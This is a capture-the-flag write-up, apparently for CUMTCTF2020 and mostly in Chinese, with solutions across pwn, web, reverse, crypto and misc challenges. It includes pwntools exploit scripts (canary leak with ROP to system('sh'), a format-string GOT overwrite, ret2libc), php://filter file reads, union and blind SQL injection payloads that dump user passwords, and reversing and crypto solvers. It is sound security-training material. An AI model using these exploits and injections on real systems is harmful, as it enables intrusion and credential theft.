Pwn
canary
泄露canary,system(‘sh’)
from pwn import *
from LibcSearcher import *
#sh = process("./canary")
sh = remote("202.119.201.197","10004")
payload = 56 * 'a'
sh.sendline(payload)
sh.recvuntil(56 * 'a')
ca = u64(sh.recv(8)) - 0xa
#log.info("Canary:"+hex(ca))
rdi_addr = 0x4008e3
shell_addr = 0x400726
# start_main = 0x601040
# libc = LibcSearcher("__libc_start_main",start_main)
# base = start_main - libc.dump("__libc_start_main")
# binsh_addr = base + libc.dump("str_bin_sh")
# sys_addr = base + libc.dump("system")
sh_addr = 0x400904
sys_addr = 0x4005F0
payload = 56 * b"\x90" + p64(ca) + 8 * b"\x90" + p64(rdi_addr) + p64(sh_addr) + p64(sys_addr)
#ayload = flat([56*'a',ca,8*'a'])
sh.send(payload)
sh.interactive()
fmstr
formatstr写got表
from pwn import *
sh = process("./cg")
sh.sendline("nidie")
payload = fmtstr_payload(10, {0x0804A068:8})
sh.sendline(payload)
sh.interactive()
babyrop
手动泄露libc
from pwn import *
from LibcSearcher import *
#sh = process('./rop')
sh = remote("202.119.201.197","10001")
elf = ELF("./rop")
puts_plt = elf.plt['puts']
libc_start_main_got = elf.got['__libc_start_main']
main_addr = 0x0804854E
payload = (112) * 'a' + p32(puts_plt) + p32(main_addr) + p32(libc_start_main_got)
sh.recvuntil("say:")
sh.send(payload)
start_addr = u32(sh.recv()[0:4])
libc = LibcSearcher("__libc_start_main",start_addr)
base = start_addr - libc.dump("__libc_start_main")
sys_addr = base + libc.dump('system')
binsh_addr = base + libc.dump('str_bin_sh')
payload = 112 * 'a' + p32(sys_addr) + p32(0xdeadbeef) +p32(binsh_addr)
sh.send(payload)
sh.interactive()
Web
Secret
下载图片,winHex打开,最后面有源码,get两个参数 一个用数据流伪协议 data://传入Suvin_wants_a_girlfriend
另外一个param2参数在需要一个数值范围内,post两个参数,值不相等,sha1值相等,百度到两个pdf,前几百字符符合绕过条件url编码后上传得到flag
import requests
s=requests.Session()
url='http://202.119.201.197:13005/index.php?param1=data:text/plain,Suvin_wants_a_girlfriend¶m2=0x278d01'
header = {
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36"',
}
payload={'param1':'%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1',
'param2':'%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1'
}
a=s.post(url,data=payload,headers=header).content
content=str(a,encoding="utf-8")
#if len(content)>2359:
# print(i)
print(content)
简单的文件包含
首先尝试XFF=127.0.0.1失败,最后添加了头client-ip=127.0.0.1 ,得到源码,需要绕过require_once,函数解析软连接时存在问题,无法多次解析绝对路径,用伪协议php;//filter读取文件,多次重复/proc/self/root/路径最后解析为var/www/html/flag.php,post参数f得到flag
Web签到
http://202.119.201.197:13001/?1=1&file=php://filter/read/convert.base64-encode/resource=flag.php
post data:
2=2
Babysqli
username=1&password=1'/**/union/**/select/**/1,2,3,4,5,6,7,8/**/#
回显第四列
username=1&password=1'/**/union/**/select/**/1,2,3,database(),5,6,7,8/**/#
cumtctf
username=1&password=1'/**/union/**/select/**/1,2,3,database(),5,6,7,8/**/#
emails,users
username=1&password=1'/**/union/**/select/**/1,2,3,group_concat(column_name),5,6,7,8/**/from/**/information_schema.columns/**/where/**/table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login
username=1&password=1'/**/union/**/select/**/1,2,3,concat_ws(user_id,first_name,last_name,user,password,avatar,last_login,failed_login),5,6,7,8/**/from/**/cumtctf.users/**/limit/**/7,1#
Hack8Me8Hacker8CUMTCTF{27ec8034-c9fe-0cfd-d92a-84362ecf0e42}8{$avatarUrl}1337.jpg82020-09-21 13:21:0380
Babysqli2
以前好像做过类似的题,反斜线转义单引号
import requests
import time
url = 'http://202.119.201.197:13004/'
ans = ''
rowlen = 0
for row in range(0, 10000):
for len in range(0, 100): # get len
data = {
'username': '\\',
'password': '/**/or/**/(if((select/**/length(concat_ws(id,username,password))/**/from/**/cumtctf.users/**/limit/**/%i,1)>%i,1,0))#' % (row, len)
}
res = requests.post(url=url, data=data)
if 'Wrong username' in res.text:
print("row " + str(row) + '\'s length is: ' + str(len))
print('now row' + str(row) + '-----')
rowlen = len
break
words = ''
for j in range(1, rowlen + 1): # get words
low = 32
high = 126
for word in range(low, high):
data = {
'username': '\\',
'password': '/**/or/**/(if(ord(right(left((select/**/concat_ws(id,username,password)/**/from/**/cumtctf.users/**/limit/**/%i,1),%i),1))=%i,1,0))#' % (row, j, word)
}
res = requests.post(url=url, data=data)
if 'Wrong username' not in res.text:
words += chr(word)
print("now words is: " + words)
break
Re
Re1
拖入PEID无壳,IDA打开,shift+F12直接查看字符串,得到解。
Re2
UPX-d + IDA+ SHITF + 12。
Re3
生成了一个长度为29的cipher数组,输入flag后,比较是否是29位。后面是一个循环,将Flag[i]与19异或,若与cipher[i]相同,则正确。
Re4
cipher = [
80,
70,
94,
71,
80,
71,
85,
104,
86,
39,
64,
106,
76,
67,
106,
71,
123,
92,
125,
76,
37,
106,
103,
118,
80,
35,
119,
32,
110,
]
flag =''
for i in range(len(cipher)):
flag += chr(cipher[i]^19)
print(flag)
Re4
IDA打开,发现是输入flag,经过加密,和结果比较。 eMl1_l1hT9_ldcoR3OC1CW0HhC_{UF30Tp__l}。
这结果就是flag的换位操作。输入一串字符串,并且再OD里查找到其换位的情况,就能反向推出Flag了。
输入:ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-=
before = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-='
after = 'VCKWTLRID1Z7S0YQJ8-XEOMU4A3HBG5PF2N96='
flag_encrpyt = 'eMl1_l1hT9_ldcoR3OC1CW0HhC_{UF30Tp__l}'
flag = ''
for i in range(len(before)):
for j in range(len(before)):
if before[i] == after[j]:
flag += flag_encrpyt[j]
print(flag)
Re5
.NET文件,用dnspy打开,选择ACM阵营(太菜了TAT)。很快找到加密逻辑。
一开始用Z3列方程解,发现没法解,有模运算。
后来依据模的性质,直接将方程展开,组成矩阵求解。
根据hint去找了个带快速幂的脚本,用来解矩阵。
因为要输入好多次,修改下脚本,直接输入。
#include<cstdio>
#define maxn 110
#define r register
using namespace std;
typedef long long ll;
int n,p,maxi;
ll tmp,ans[maxn],a[maxn][maxn];
int key[41] ={
233,
136,
189,
132,
157,
100,
196,
185,
138,
222,
90,
101,
115,
229,
161,
97,
135,
122,
127,
230,
143,
203,
137,
119,
80,
141,
227,
156,
178,
105,
133,
194,
184,
179,
159,
220,
111,
177,
145,
200,
181};
int sum[41] = {
46384,
31562,
39797,
36757,
62393,
15780,
41763,
29976,
5998,
4308,
40650,
45891,
6897,
54534,
14623,
49558,
23530,
37973,
3560,
18854,
47021,
52794,
16283,
28942,
33213,
25540,
62337,
7253,
14550,
60109,
25945,
26838,
55988,
46800,
47119,
44280,
58951,
62100,
59760,
25395,
16590
};
int read()
{
r char ch=getchar();r int in=0;
while(ch>'9'||ch<'0') ch=getchar();
while(ch>='0'&&ch<='9') in=(in<<3)+(in<<1)+ch-'0',ch=getchar();
return in;
}
ll ksm(r ll x,r int y) //快速幂算法
{
if(!y) return 1;
r ll ret=ksm(x,y>>1);
if(y&1) return ret*ret%p*x%p;
return ret*ret%p;
}
int main()
{
//sum[0] = flag[i]*(k^(j-i)) ...... flag[41]*(k^(1))
//从1开始。
/*n=read(),p=read();
for(r int i=1;i<=n;i++)
for(r int j=1;j<=n+1;j++)
a[i][j]=read();*/
n = 41 ; //41个未知数
p = 65537; //p是取模
for(r int i=1;i<=n;i++) //赋值a数组,其内容是k的幂,n从1开始,到41
for(r int j=1;j<=n;j++) //i是行,j是列,也是从第一列开始到第41列
a[i][j]=ksm(key[i-1],40-j+1);
for(int i =1;i<=41;i++){ //对矩阵最后一列(第42列)进行sum赋值
a[i][42]=sum[i-1];
}
for(r int i=1;i<=n;i++)
{
if(!a[i][i])//主元不能为0
{
maxi=0;
for(r int j=i+1;j<=n&&!maxi;j++)
if(a[j][i]) maxi=j;
if(!maxi) continue;//如果一整列都为0,不需要消元
for(r int j=i;j<=n+1;j++)
tmp=a[maxi][j],a[maxi][j]=a[i][j],a[i][j]=tmp;
}
for(r int j=i+1;j<=n;j++)
{
tmp=a[j][i];
if(!tmp) continue;//已经为0,不需要消元
for(r int k=i;k<=n+1;k++)
a[j][k]=((a[j][k]*a[i][i]-a[i][k]*tmp)%p+p)%p;
}
}
for(r int i=n;i;i--)
{
for(r int j=i+1;j<=n;j++)
a[i][n+1]=((a[i][n+1]-ans[j]*a[i][j])%p+p)%p;
ans[i]=a[i][n+1]*ksm(a[i][i],p-2)%p;
}
for(r int i=1;i<=n;i++) printf("%lld ",ans[i]);
return 0;
}
Re6
先读懂七夕算法。这题给了加密后的Jpg图片,与加密用的脚本。逆出加密逻辑就行了。IDA打开exe文件。找到加密函数,因为太大,无法F5。直接看汇编。
进入encrypt()函数。
只能一步步跟了,大概分析出前几个逻辑之后。分析出规律,并且每次得到的新变量都会放进[ebp+var10]处,直接x跟踪这个变量,就能在上下文中快速得到剩下的加密逻辑。
最后总结得到总的加密逻辑,是七夕算法稍稍改变。
a=(x<<12h)^x
b=(a<<1Ch)^a
c=(b>>2h)^b
d = (c>>9)^c
e = (d>>16h)^d
f = (e<<8)^e
g = (f>>12h)^f
h = (g<<1Bh)^g
i = (h<<4)^h
j = (i<<12h)^i
k = (j<<10h)^j
l = (k>>0Ah)^k
m = (l>>0Bh)^l
n = (m>>19h)^m
o = (n>>0Fh)^n
// 在带佬的文件加密算法中修改一下就好了。
unsigned int decrypt(unsigned int z){
/*unsigned int y = leftShiftXor(c, 13);
unsigned int x = rightShiftXor(y, 17);
unsigned int p = leftShiftXor(x, 5);
return p;*/
unsigned int n = rightShiftXor(z,15);
unsigned int m = rightShiftXor(n,25);
unsigned int l = rightShiftXor(m,11);
unsigned int k = rightShiftXor(l,10);
unsigned int j = leftShiftXor(k,16);
unsigned int i = leftShiftXor(j,18);
unsigned int h = leftShiftXor(i,4);
unsigned int g = leftShiftXor(h,27);
unsigned int f = rightShiftXor(g,18);
unsigned int e = leftShiftXor(f,8);
unsigned int d = rightShiftXor(e,22);
unsigned int c = rightShiftXor(d,9);
unsigned int b = rightShiftXor(c,2);
unsigned int a = leftShiftXor(b,28);
unsigned int x = leftShiftXor(a,18);
return x;
}
Crypto
幼儿园的密码题
分解n
小学生的密码题
#c = [21,8841,841,884,21,884,42,888888821,8881,88888421,88888841,888421,88881,8888882,888841,888421,882,888881,8888421,88888,8888884,888888841]
c ="2108841084108840210884042088888882108881088888421088888841088842108888108888882088884108884210882088888108888421088888088888840888888841"
dic = [chr(i) for i in range(ord("A"), ord("}") + 1)]
flag = []
print(len(c))
ans = 0
for i in range(len(c)):
if(c[i] != '0'):
if(c[i] == '8'):
ans += 8
if(c[i] == '4'):
ans += 4
if(c[i] == '2'):
ans += 2
if(c[i] == '1'):
ans += 1
elif(c[i] == '0'):
flag.append(ans)
ans = 0
print(flag)
x = ''
for i in flag:
x += dic[i-1]
print(x)
初中生的密码题
构造z3方程解除p,q,取绝对值转成正数。
维也纳的秘密
wiener’s attack
我只吃素
转为十六进制,再转字节流继续素数进制转换
36进制以下用pyhton自带int(a,n)模块,之后用进制表转换
# with open('10.txt', 'r') as f:
# a=f.read()
# b=int(a,37)
# c = str(bytes.fromhex(hex(b)[2:]))
# with open('11.txt', 'w') as f:
# f.write(c)
# print(c)
# a = 53774449144672072651983634999671257979028588739250085327427356842712128211693421006687459464296243751556246647104051338954036978334150758486798783752000076286724674301629980950557216155876376289491412124652632403402402370503151966644377052977831198024219894816336334348407952187642977780265673369611181007658284747634523818825633001988566552637112354696755
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# bb = 4ewx8C68op0f6pc51so1ABm9lgBce7n8mj2o3djj39pqg2m4zd5qessijlCEy2a6nEE68Azzkfyawf0k0a2k5p3fAndzwvq3zudewnxe9yviCjy1bf3vB0fzn4y7oDlmdzge0txueBf7C3que1n3
# a = 5233728613606375657976979928056020574196863114188155716918309649738148318536854787122881232353110295371937978401912391749326699926603517862001910055203420511693337124690962705924804069703297414559735308881968136915280669320608716232802884
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# bb = 3prvE6r8jk8di37jGCfa4f2fCmb346lj4a51ymdqdk5hcCmGtB1th2l6zr2DGhgfv84Auq8kcckseCtq3e9vEsxdnkfg6aseGBD
# a = 43229137788244061542329848418700912953338168325804934916798790745654484584181753227393507557337247395185522499289482806852163725858927915419179194163003038581365
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# a = 240601209018277235944025722380346889467221886496245930369392695432568925262249710088493177491025158020547047284
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
# a = 6071069041322015914824844158128867915719328949545468665089325844368923468715106
# b = str(bytes.fromhex(hex(a)[2:]))
# print(b)
a = 6289936645427058418849789859504444219159397
b = str(bytes.fromhex(hex(a)[2:]))
print(b)
#H4ve_fun_with_base
#CUMTCTF{H4ve_fun_with_base}
#coding=gbk
def f(nx,x1,x):
#n为待转换的十进制数,x为机制,取值为2-62
a=['0','1','2','3','4','5','6','7','8','9',
'a','b','c','d','e','f','g','h','i','j','k',
'l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
'A','B','C','D','E','F','G','H','I','J','K',
'L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
nx=str(nx)
b1=list(nx)
print (nx,"[",x1,"]==[",x,"] ",end='')
b2=[]
for i in b1:
for i1 in range(0,62):
if a[i1]==i:
b2=b2+[i1]
if i1>x1:
print (i,"错误定义")
b2.reverse()
#print(b2)
n1=0
n2=1
for i in b2:
n1=n1+int(i)*(pow(x1,n2-1)) #pow(x, n),即计算 x 的 n 次幂函数
n2=n2+1
#print (n1,n2)
n=n1
#print(n)
b=[]
while True:
s=n//x#商
y=n%x#余数
b=b+[y]
if s==0:
break
n=s
b.reverse() #reverse() 函数用于反向列表中元素,由个,十百转为百十个
bd=""
for i in b:
#print(a[i],end='')
bd=bd+a[i]
print (bd)
return bd
# chun='zF4mOFpN7A'
# print (chun)
# print (f(chun[0:2],62,10)+f(chun[2:6],62,10)+f(chun[6:11],62,10))
# for i in range(0,62):
# f(str(i),10,62)
#F(str,str的进制,需要转换的进制)
fl = 'SrUs8vUbLghjqO2fI4IvUgaN'
print(f(fl,61,10))
Misc
真签到题
拖入010,找到base64,解码
兔兔那么可爱
with open('flag', 'r') as f:
a=f.read()
list(a)
l = len(a)
def fib(n):
one=0
two=1
while n>0:
one,two=two,one+two
n-=1
yield two
key = []
for i in fib(100):
key.append(i)
print(key)
flag = ''
for i in key:
if(i <= l):
flag += a[i-1]
print(flag)
#CUMTCTF{Are_rabbits_cute?}
大鲨鱼之你可劲找
打开追踪http流,发现为sql注入流量包,用脚本将sql语句和response导入文件发现为二分查找,每次以79开始,找每一个79之前的流量包,手工收集并转码,最后得到带分隔符的数字flag
别做题了听歌吧
先用audacity打开什么没有发现,尝试mp3stego,猜测密码为cumt,分离出带tab和和空格的txt,猜测为摩斯密码,写脚本tab转- 空格转. 换行转/解码得到flag
连签到都算不上
base64解码之后扫码,然后unicode解码,然后社会主义核心价值观解码
残缺的大鲨鱼
追踪TCP流可以发现某个TCP流中有传输的文件flag.zip
,选择显示和保存数据为原始数据保存流量,在winhex
中把开头的http
头部去掉,然后解压可以得到文件flag
根据hint可以发现flag文件是个反过来的jpg文件
with open('./flag','rb') as r:
content = r.read()
with open('./res.jpg', 'wb') as w:
w.write(content[::-1])
在winhex中可以发现文件末尾有zip文件的结尾,但是没有开始,不过可以发现hex值03 04 14 00
,修改一下前两个字节然后保存到新文件,解压即可得到bbxxss.txt,其中的codeemoji上次考过,code emoji解码即可
👾🐝🐁🐙👾🐙😸🚚🎂🏪💑🌋🍴🍖💪🎢🍖🍭🚄🏯🏯🚒😴🚣
You know what I mean?
官方题解:CUMTCTF2020官方题解